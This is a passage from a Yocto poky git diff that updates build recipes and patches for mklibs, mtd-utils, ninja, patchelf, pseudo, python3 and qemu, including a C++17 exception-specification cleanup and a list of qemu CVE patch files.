a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp +index 0e4c0f3..2e6d0f6 100644 +--- a/src/mklibs-readelf/elf.cpp ++++ b/src/mklibs-readelf/elf.cpp +@@ -36,7 +36,7 @@ file::~file () throw () + delete *it; + } + +-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error) ++file *file::open (const char *filename) throw () + { + struct stat buf; + int fd; +@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro + } + + template<typename _class> +-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file *file::open_class(uint8_t *mem, size_t len) throw () + { + switch (mem[EI_DATA]) + { +@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run + } + + template <typename _class, typename _data> +-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw () + : file(mem, len) + { + if (mem[EI_CLASS] != _class::id) +@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw () + } + + template <typename _class, typename _data> +-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc) ++void section_data<_class, _data>::update(const file &file) throw () + { + const section_type<section_type_STRTAB> §ion = + dynamic_cast<const section_type<section_type_STRTAB> &>(file.get_section(file.get_shstrndx())); +@@ -204,7 +204,7 @@ section_type<section_type_DYNAMIC>::~section_type() throw () + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNAMIC) +@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -243,7 +243,7 @@ section_type<section_type_DYNSYM>::~section_type() throw () + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNSYM) +@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw () + { + section_data<_class, _data>::update (file); + +@@ -285,7 +285,7 @@ const version_definition *section_type<section_type_GNU_VERDEF>::get_version_def + } + + template <typename _class, typename _data> +-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_GNU_verdef) +@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -333,7 +333,7 @@ const version_requirement_entry *section_type<section_type_GNU_VERNEED>::get_ver + + template <typename _class, typename _data> + section_real<_class, _data, section_type_GNU_VERNEED>:: +-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_verneed) +@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) + } + + template <typename _class, typename _data> +-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f + + template <typename _class, typename _data> + section_real<_class, _data, section_type_GNU_VERSYM>:: +-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real (Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_versym) +@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw () + } + + template <typename _class, typename _data> +-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc) ++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw () + : segment_data<_class, _data> (header, mem) + { + if (this->type != PT_INTERP) +@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw () + } + + template <typename _class, typename _data> +-void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void dynamic_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw () + { + if (is_string) + val_string = section.get_string(val); + } + +-std::string symbol::get_version () const throw (std::bad_alloc) ++std::string symbol::get_version () const throw () + { + if (verneed) + return verneed->get_name(); +@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc) + return "Base"; + } + +-std::string symbol::get_version_file () const throw (std::bad_alloc) ++std::string symbol::get_version_file () const throw () + { + if (verneed) + return verneed->get_file(); +@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc) + return "None"; + } + +-std::string symbol::get_name_version () const throw (std::bad_alloc) ++std::string symbol::get_name_version () const throw () + { + std::string ver; + +@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw () + } + + template <typename _class, typename _data> +-void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw () + { + name_string = section.get_string(name); + } + + template <typename _class, typename _data> +-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw () + { + if (!file.get_section_GNU_VERSYM()) + return; +@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef) + } + + template <typename _class, typename _data> +-void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++void version_definition_data<_class, _data>::update_string(const section_type<section_type_STRTAB> §ion) throw () + { + for (std::vector<uint32_t>::iterator it = names.begin(); it != names.end(); ++it) + names_string.push_back(section.get_string(*it)); + } + +-version_requirement::version_requirement() throw (std::bad_alloc) ++version_requirement::version_requirement() throw () + : file_string("None") + { } + +@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern + + template <typename _class, typename _data> + void version_requirement_data<_class, _data>:: +-update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++update_string(const section_type<section_type_STRTAB> §ion) throw () + { + file_string = section.get_string(file); + +@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed) + + template <typename _class, typename _data> + void version_requirement_entry_data<_class, _data>:: +-update_string(const section_type<section_type_STRTAB> §ion) throw (std::bad_alloc) ++update_string(const section_type<section_type_STRTAB> §ion) throw () + { + name_string = section.get_string(name); + } +diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp +index 70e61cd..afb0c9e 100644 +--- a/src/mklibs-readelf/elf.hpp ++++ b/src/mklibs-readelf/elf.hpp +@@ -49,7 +49,7 @@ namespace Elf + const uint16_t get_shstrndx() const throw () { return shstrndx; } + + const std::vector<section *> get_sections() const throw () { return sections; }; +- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); }; ++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); }; + const section_type<section_type_DYNAMIC> *get_section_DYNAMIC() const throw () { return section_DYNAMIC; }; + const section_type<section_type_DYNSYM> *get_section_DYNSYM() const throw () { return section_DYNSYM; }; + const section_type<section_type_GNU_VERDEF> *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; }; +@@ -59,13 +59,13 @@ namespace Elf + const std::vector<segment *> get_segments() const throw () { return segments; }; + const segment_type<segment_type_INTERP> *get_segment_INTERP() const throw () { return segment_INTERP; }; + +- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error); ++ static file *open(const char *filename) throw (); + + protected: +- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { } ++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { } + + template<typename _class> +- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error); ++ static file *open_class(uint8_t *, size_t) throw (); + + uint16_t type; + uint16_t machine; +@@ -128,7 +128,7 @@ namespace Elf + class section_type<section_type_STRTAB> : public virtual section + { + public: +- std::string get_string(uint32_t offset) const throw (std::bad_alloc) ++ std::string get_string(uint32_t offset) const throw () + { + return std::string(reinterpret_cast<const char *> (mem + offset)); + } +@@ -263,10 +263,10 @@ namespace Elf + uint8_t get_bind () const throw () { return bind; } + uint8_t get_type () const throw () { return type; } + const std::string &get_name_string() const throw () { return name_string; } +- std::string get_version() const throw (std::bad_alloc); +- std::string get_version_file() const throw (std::bad_alloc); ++ std::string get_version() const throw (); ++ std::string get_version_file() const throw (); + uint16_t get_version_data() const throw () { return versym; } +- std::string get_name_version() const throw (std::bad_alloc); ++ std::string get_name_version() const throw (); + + protected: + uint32_t name; +@@ -305,7 +305,7 @@ namespace Elf + class version_requirement + { + public: +- version_requirement() throw (std::bad_alloc); ++ version_requirement() throw (); + virtual ~version_requirement () throw () { } + + const std::string &get_file() const throw () { return file_string; } +diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp +index 05effee..3871982 100644 +--- a/src/mklibs-readelf/elf_data.hpp ++++ b/src/mklibs-readelf/elf_data.hpp +@@ -94,7 +94,7 @@ namespace Elf + class file_data : public file + { + public: +- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error); ++ file_data(uint8_t *, size_t len) throw (); + + const uint8_t get_class() const throw () { return _class::id; } + const uint8_t get_data() const throw () { return _data::id; } +@@ -109,7 +109,7 @@ namespace Elf + public: + section_data(Shdr *, uint8_t *) throw (); + +- virtual void update(const file &) throw (std::bad_alloc); ++ virtual void update(const file &) throw (); + }; + + template <typename _class, typename _data, typename _type> +@@ -133,9 +133,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -147,9 +147,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -161,9 +161,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -175,9 +175,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template <typename _class, typename _data> +@@ -189,7 +189,7 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + }; + + template <typename _class, typename _data> +@@ -220,7 +220,7 @@ namespace Elf + typedef typename _elfdef<_class>::Phdr Phdr; + + public: +- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc); ++ segment_real (Phdr *, uint8_t *) throw (); + }; + + template <typename _class, typename _data> +@@ -232,7 +232,7 @@ namespace Elf + public: + dynamic_data (Dyn *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -244,8 +244,8 @@ namespace Elf + public: + symbol_data (Sym *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); +- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); ++ virtual void update_version (const file &, uint16_t) throw (); + }; + + template <typename _class, typename _data> +@@ -257,7 +257,7 @@ namespace Elf + + version_definition_data (Verdef *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -269,7 +269,7 @@ namespace Elf + + version_requirement_data (Verneed *) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + + template <typename _class, typename _data> +@@ -280,7 +280,7 @@ namespace Elf + + version_requirement_entry_data (Vernaux *, const version_requirement &) throw (); + +- void update_string(const section_type<section_type_STRTAB> &) throw (std::bad_alloc); ++ void update_string(const section_type<section_type_STRTAB> &) throw (); + }; + } + +-- +2.11.0 + diff --git a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb index 1784af1f4c..07142e57e0 100644 --- a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb +++ b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb @@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/ file://avoid-failure-on-symbol-provided-by-application.patch \ file://show-GNU-unique-symbols-as-provided-symbols.patch \ file://fix_cross_compile.patch \ + file://remove-deprecated-exception-specification-cpp17.patch \ " SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc" diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch deleted file mode 100644 index d43f7e1a7a..0000000000 --- a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch +++ /dev/null @@ -1,62 +0,0 @@ -From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001 -From: Barry Grussling <barry@grussling.com> -Date: Sun, 12 Jan 2020 12:33:32 -0800 -Subject: [PATCH] mtd-utils: Fix return value of ubiformat -Organization: O.S. Systems Software LTDA. - -This changeset fixes a feature regression in ubiformat. Older versions of -ubiformat, when invoked with a flash-image, would return 0 in the case no error -was encountered. Upon upgrading to latest, it was discovered that ubiformat -returned 255 even without encountering an error condition. - -This changeset corrects the above issue and causes ubiformat, when given an -image file, to return 0 when no errors are detected. - -Tested by running through my loading scripts and verifying ubiformat returned -0. - -Upstream-Status: Backport [2.1.2] - -Signed-off-by: Barry Grussling <barry@grussling.com> -Signed-off-by: David Oberhollenzer <david.oberhollenzer@sigma-star.at> -Signed-off-by: Otavio Salvador <otavio@ossystems.com.br> ---- - ubi-utils/ubiformat.c | 7 +++++-- - 1 file changed, 5 insertions(+), 2 deletions(-) - -diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c -index a90627c..5377b12 100644 ---- a/ubi-utils/ubiformat.c -+++ b/ubi-utils/ubiformat.c -@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - struct ubi_vtbl_record *vtbl; - int eb1 = -1, eb2 = -1; - long long ec1 = -1, ec2 = -1; -+ int ret = -1; - - write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1; - write_size /= mtd->subpage_size; -@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - if (!args.quiet && !args.verbose) - printf("\n"); - -- if (novtbl) -+ if (novtbl) { -+ ret = 0; - goto out_free; -+ } - - if (eb1 == -1 || eb2 == -1) { - errmsg("no eraseblocks for volume table"); -@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - - out_free: - free(hdr); -- return -1; -+ return ret; - } - - int main(int argc, char * const argv[]) --- -2.27.0 - diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb index 9c05dc03dc..fa42770ee4 100644 --- a/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb +++ b/poky/meta/recipes-devtools/mtd/mtd-utils_git.bb @@ -11,18 +11,15 @@ inherit autotools pkgconfig update-alternatives DEPENDS = "zlib e2fsprogs util-linux" RDEPENDS_mtd-utils-tests += "bash" -PV = "2.1.1" +PV = "2.1.3" -SRCREV = "4443221ce9b88440cd9f5bb78e6fe95621d36c8a" -SRC_URI = "git://git.infradead.org/mtd-utils.git \ +SRCREV = "42ea7cd48d2b3c306d59bb6c530d79f8c25bf9f5" +SRC_URI = "git://git.infradead.org/mtd-utils.git;branch=master \ file://add-exclusion-to-mkfs-jffs2-git-2.patch \ - file://0001-mtd-utils-Fix-return-value-of-ubiformat.patch \ -" + " S = "${WORKDIR}/git/" -EXTRA_OECONF += "--enable-install-tests" - # xattr support creates an additional compile-time dependency on acl because # the sys/acl.h header is needed. libacl is not needed and thus enabling xattr # regardless whether acl is enabled or disabled in the distro should be okay. diff --git a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb index c02b876c02..ae3f3f1ea8 100644 --- a/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb +++ b/poky/meta/recipes-devtools/ninja/ninja_1.10.0.bb @@ -8,7 +8,7 @@ DEPENDS = "re2c-native ninja-native" SRCREV = "ed7f67040b370189d989adbd60ff8ea29957231f" -SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release" +SRC_URI = "git://github.com/ninja-build/ninja.git;branch=release;protocol=https" UPSTREAM_CHECK_GITTAGREGEX = "v(?P<pver>.*)" S = "${WORKDIR}/git" diff --git a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb index b64eaf3c21..2bf3108f88 100644 --- a/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb +++ b/poky/meta/recipes-devtools/patchelf/patchelf_0.10.bb @@ -4,7 +4,7 @@ HOMEPAGE = "https://github.com/NixOS/patchelf" LICENSE = "GPLv3" -SRC_URI = "git://github.com/NixOS/patchelf;protocol=https \ +SRC_URI = "git://github.com/NixOS/patchelf;protocol=https;branch=master \ file://handle-read-only-files.patch \ file://fix-adjusting-startPage.patch \ file://fix-phdrs.patch \ diff --git a/poky/meta/recipes-devtools/pseudo/files/build-oldlibc b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc new file mode 100755 index 0000000000..85c438de4e --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/build-oldlibc @@ -0,0 +1,20 @@ +#!/bin/sh +# +# Script to re-generate pseudo-prebuilt-2.33.tar.xz +# +# Copyright (C) 2021 Richard Purdie +# +# SPDX-License-Identifier: GPL-2.0-only +# + +for i in x86_64 aarch64 i686; do + if [ ! -e $i-nativesdk-libc.tar.xz ]; then + wget http://downloads.yoctoproject.org/releases/uninative/3.2/$i-nativesdk-libc.tar.xz + fi + tar -xf $i-nativesdk-libc.tar.xz --wildcards \*/lib/libpthread\* \*/lib/libdl\* + cd $i-linux/lib + ln -s libdl.so.2 libdl.so + ln -s libpthread.so.0 libpthread.so + cd ../.. +done +tar -cJf pseudo-prebuilt-2.33.tar.xz *-linux
\ No newline at end of file diff --git a/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch new file mode 100644 index 0000000000..c453b5f735 --- /dev/null +++ b/poky/meta/recipes-devtools/pseudo/files/older-glibc-symbols.patch @@ -0,0 +1,57 @@ +If we link against a newer glibc 2.34 and then try and our LD_PRELOAD is run against a +binary on a host with an older libc, we see symbol errors since in glibc 2.34, pthread +and dl are merged into libc itself. + +We need to use the older form of linking so use glibc binaries from an older release +to force this. We only use minimal symbols from these anyway. + +pthread_atfork is problematic, particularly on arm so use the internal glibc routine +it maps too. This was always present in the main libc from 2.3.2 onwards. + +Yes this is horrible. Better solutions welcome. + +There is more info in the bug: [YOCTO #14521] + +Upstream-Status: Inappropriate [this patch is native and nativesdk] +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Tweak library search order, make prebuilt lib ahead of recipe lib +Signed-off-by: Hongxu Jia <hongxu.jia@windriver.com> +--- + Makefile.in | 2 +- + pseudo_wrappers.c | 5 ++++- + 2 files changed, 5 insertions(+), 2 deletions(-) + +diff --git a/Makefile.in b/Makefile.in +--- a/Makefile.in ++++ b/Makefile.in +@@ -120,7 +120,7 @@ $(PSEUDODB): pseudodb.o $(SHOBJS) $(DBOBJS) pseudo_ipc.o | $(BIN) + libpseudo: $(LIBPSEUDO) + + $(LIBPSEUDO): $(WRAPOBJS) pseudo_client.o pseudo_ipc.o $(SHOBJS) | $(LIB) +- $(CC) $(CFLAGS) $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ ++ $(CC) $(CFLAGS) -Lprebuilt/$(shell uname -m)-linux/lib/ $(CFLAGS_PSEUDO) -shared -o $(LIBPSEUDO) \ + pseudo_client.o pseudo_ipc.o \ + $(WRAPOBJS) $(SHOBJS) $(LDFLAGS) $(CLIENT_LDFLAGS) + +diff --git a/pseudo_wrappers.c b/pseudo_wrappers.c +--- a/pseudo_wrappers.c ++++ b/pseudo_wrappers.c +@@ -100,10 +100,13 @@ static void libpseudo_atfork_child(void) + pseudo_mutex_holder = 0; + } + ++extern void *__dso_handle; ++extern int __register_atfork (void (*) (void), void (*) (void), void (*) (void), void *); ++ + static void + _libpseudo_init(void) { + if (!_libpseudo_initted) +- pthread_atfork(NULL, NULL, libpseudo_atfork_child); ++ __register_atfork (NULL, NULL, libpseudo_atfork_child, &__dso_handle == NULL ? NULL : __dso_handle); + + pseudo_getlock(); + pseudo_antimagic(); +-- +2.27.0 + diff --git a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb index 0ba460f3e6..1a5d230c69 100644 --- a/poky/meta/recipes-devtools/pseudo/pseudo_git.bb +++ b/poky/meta/recipes-devtools/pseudo/pseudo_git.bb @@ -5,8 +5,15 @@ SRC_URI = "git://git.yoctoproject.org/pseudo;branch=oe-core \ file://fallback-passwd \ file://fallback-group \ " +SRC_URI:append:class-native = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI:append:class-nativesdk = " \ + http://downloads.yoctoproject.org/mirror/sources/pseudo-prebuilt-2.33.tar.xz;subdir=git/prebuilt;name=prebuilt \ + file://older-glibc-symbols.patch" +SRC_URI[prebuilt.sha256sum] = "ed9f456856e9d86359f169f46a70ad7be4190d6040282b84c8d97b99072485aa" -SRCREV = "b988b0a6b8afd8d459bc9a2528e834f63a3d59b2" +SRCREV = "d34f2f6cedccf8488730001bcbde6bb7499f8814" S = "${WORKDIR}/git" PV = "1.9.0+git${SRCPV}" diff --git a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb index 698016ba4c..b73310c808 100644 --- a/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb +++ b/poky/meta/recipes-devtools/python/python3-magic_0.4.15.bb @@ -14,6 +14,11 @@ inherit pypi setuptools3 SRC_URI[md5sum] = "e384c95a47218f66c6501cd6dd45ff59" SRC_URI[sha256sum] = "f3765c0f582d2dfc72c15f3b5a82aecfae9498bd29ca840d72f37d7bd38bfcd5" -RDEPENDS_${PN} += "file" +DEPENDS_append_class-native = " file-replacement-native" + +RDEPENDS_${PN} += "file \ + ${PYTHON_PN}-ctypes \ + ${PYTHON_PN}-io \ + ${PYTHON_PN}-shell" BBCLASSEXTEND = "native" diff --git a/poky/meta/recipes-devtools/python/python3/makerace.patch b/poky/meta/recipes-devtools/python/python3/makerace.patch new file mode 100644 index 0000000000..8971f28b8e --- /dev/null +++ b/poky/meta/recipes-devtools/python/python3/makerace.patch @@ -0,0 +1,23 @@ +libainstall installs python-config.py but the .pyc cache files are generated +by the libinstall target. This means some builds may not generate the pyc files +for python-config.py depending on the order things happen in. This means builds +are not always reproducible. + +Add a dependency to avoid the race. + +Upstream-Status: Pending +Signed-off-by: Richard Purdie <richard.purdie@linuxfoundation.org> + +Index: Python-3.8.11/Makefile.pre.in +=================================================================== +--- Python-3.8.11.orig/Makefile.pre.in ++++ Python-3.8.11/Makefile.pre.in +@@ -1415,7 +1415,7 @@ LIBSUBDIRS= tkinter tkinter/test tkinter + unittest unittest/test unittest/test/testmock \ + venv venv/scripts venv/scripts/common venv/scripts/posix \ + curses pydoc_data +-libinstall: build_all $(srcdir)/Modules/xxmodule.c ++libinstall: build_all $(srcdir)/Modules/xxmodule.c libainstall + @for i in $(SCRIPTDIR) $(LIBDEST); \ + do \ + if test ! -d $(DESTDIR)$$i; then \ diff --git a/poky/meta/recipes-devtools/python/python3_3.8.11.bb b/poky/meta/recipes-devtools/python/python3_3.8.12.bb index f549bb2205..cfcc91b396 100644 --- a/poky/meta/recipes-devtools/python/python3_3.8.11.bb +++ b/poky/meta/recipes-devtools/python/python3_3.8.12.bb @@ -33,6 +33,7 @@ SRC_URI = "http://www.python.org/ftp/python/${PV}/Python-${PV}.tar.xz \ file://0001-configure.ac-fix-LIBPL.patch \ file://0001-python3-Do-not-hardcode-lib-for-distutils.patch \ file://0020-configure.ac-setup.py-do-not-add-a-curses-include-pa.patch \ + file://makerace.patch \ " SRC_URI_append_class-native = " \ @@ -41,8 +42,8 @@ SRC_URI_append_class-native = " \ file://0001-Don-t-search-system-for-headers-libraries.patch \ " -SRC_URI[md5sum] = "5840ba601128f48fee4e7c98fbdac65d" -SRC_URI[sha256sum] = "fb1a1114ebfe9e97199603c6083e20b236a0e007a2c51f29283ffb50c1420fb2" +SRC_URI[md5sum] = "9dd8f82e586b776383c82e27923f8795" +SRC_URI[sha256sum] = "b1d3a76420375343b5e8a22fceb1ac65b77193e9ed27146524f0a9db058728ea" # exclude pre-releases for both python 2.x and 3.x UPSTREAM_CHECK_REGEX = "[Pp]ython-(?P<pver>\d+(\.\d+)+).tar" diff --git a/poky/meta/recipes-devtools/qemu/qemu.inc b/poky/meta/recipes-devtools/qemu/qemu.inc index e25c2524aa..ef9bc3f64a 100644 --- a/poky/meta/recipes-devtools/qemu/qemu.inc +++ b/poky/meta/recipes-devtools/qemu/qemu.inc @@ -35,27 +35,64 @@ SRC_URI = "https://download.qemu.org/${BPN}-${PV}.tar.xz \ file://CVE-2020-7039-2.patch \ file://CVE-2020-7039-3.patch \ file://0001-Add-enable-disable-udev.patch \ - file://CVE-2020-7211.patch \ - file://0001-qemu-Do-not-include-file-if-not-exists.patch \ + file://CVE-2020-7211.patch \ + file://0001-qemu-Do-not-include-file-if-not-exists.patch \ file://CVE-2020-11102.patch \ - file://CVE-2020-11869.patch \ - file://CVE-2020-13361.patch \ - file://CVE-2020-10761.patch \ - file://CVE-2020-10702.patch \ - file://CVE-2020-13659.patch \ - file://CVE-2020-13800.patch \ - file://CVE-2020-13362.patch \ - file://CVE-2020-15863.patch \ - file://CVE-2020-14364.patch \ - file://CVE-2020-14415.patch \ - file://CVE-2020-16092.patch \ - file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ - file://CVE-2019-20175.patch \ - file://CVE-2020-24352.patch \ - file://CVE-2020-25723.patch \ - file://CVE-2021-20203.patch \ - file://CVE-2021-3392.patch \ - " + file://CVE-2020-11869.patch \ + file://CVE-2020-13361.patch \ + file://CVE-2020-10761.patch \ + file://CVE-2020-10702.patch \ + file://CVE-2020-13659.patch \ + file://CVE-2020-13800.patch \ + file://CVE-2020-13362.patch \ + file://CVE-2020-15863.patch \ + file://CVE-2020-14364.patch \ + file://CVE-2020-14415.patch \ + file://CVE-2020-16092.patch \ + file://0001-target-mips-Increase-number-of-TLB-entries-on-the-34.patch \ + file://CVE-2019-20175.patch \ + file://CVE-2020-24352.patch \ + file://CVE-2020-25723.patch \ + file://CVE-2021-20203.patch \ + file://CVE-2021-3392.patch \ + file://CVE-2020-25085.patch \ + file://CVE-2020-25624_1.patch \ + file://CVE-2020-25624_2.patch \ + file://CVE-2020-25625.patch \ + file://CVE-2020-29443.patch \ + 